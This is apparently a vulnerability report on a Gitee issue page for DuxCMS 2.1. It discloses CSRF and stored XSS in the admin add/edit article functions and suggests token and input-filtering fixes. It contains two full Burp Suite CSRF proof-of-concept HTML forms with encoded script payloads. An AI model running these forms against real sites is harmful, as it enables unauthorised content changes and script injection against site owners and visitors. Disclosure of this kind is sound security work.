1 Star 3 Fork 1

王爷 / DuxCMS2.1支持php7.0以上版本

 / 详情

Add article has CSRF and XSS

待办的
创建于  
2020-01-09 10:05

Add/Edit article

login in the system,and add article like this.

test-1

The captured data packet has an xss vulnerability in the content parameter.

test-2

edit article test

Generate CSRF payload using Burpsuite plugin.

test-3

copy that and edit like this.This is a edit article payload

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
      <input type="hidden" name="class_id" value="2" />
      <input type="hidden" name="title" value="test333333" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="get_image" value="1" />
      <input type="hidden" name="get_image_num" value="1" />
      <input type="hidden" name="get_description" value="1" />
      <input type="hidden" name="description" value="sfdadsfadfa" />
      <input type="hidden" name="keywords" value="sfdadsfadfa" />
      <input type="hidden" name="taglink" value="1" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="font_color" value="0" />
      <input type="hidden" name="urltitle" value="test2" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="time" value="2020&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="copyfrom" value="sds&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="views" value="6" />
      <input type="hidden" name="sequence" value="0" />
      <input type="hidden" name="tpl" value="" />
      <input type="hidden" name="content_id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

if you want to edit "test111111"

test=3

run this payload like this and it will edit successfully this article content.

test-4

test-5

access this article and it will alert something like this.

test-6

Add article test

CSRF and XSS Payload

this payload is use add article and input evil javascript in "content" parameter.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
      <input type="hidden" name="class&#95;id" value="1" />
      <input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="get&#95;image" value="1" />
      <input type="hidden" name="get&#95;image&#95;num" value="1" />
      <input type="hidden" name="get&#95;description" value="1" />
      <input type="hidden" name="description" value="adfads" />
      <input type="hidden" name="keywords" value="adfa" />
      <input type="hidden" name="taglink" value="1" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="font&#95;color" value="0" />
      <input type="hidden" name="urltitle" value="" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="time" value="2020&#47;01&#47;08&#32;15&#58;49" />
      <input type="hidden" name="copyfrom" value="æ&#156;&#172;ç&#171;&#153;" />
      <input type="hidden" name="views" value="0" />
      <input type="hidden" name="sequence" value="0" />
      <input type="hidden" name="tpl" value="" />
      <input type="hidden" name="content&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

run this payload.

test-8

and you can see add one article "aaaaaaaaaaaaaaaaa"

test-9

access it and it will successfully run some evil javascript like this.

test10

Csrf and xss vulnerabilities are caused because tokens are not set for functions and sensitive characters are filtered.

Solution

1)Set token for this function.
2)Filtering sensitive characters for any input data.

评论 (0)

godmarlin 创建了任务

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
PHP
1
https://gitee.com/annyshow/DuxCMS2.1.git
git@gitee.com:annyshow/DuxCMS2.1.git
annyshow
DuxCMS2.1
DuxCMS2.1支持php7.0以上版本

搜索帮助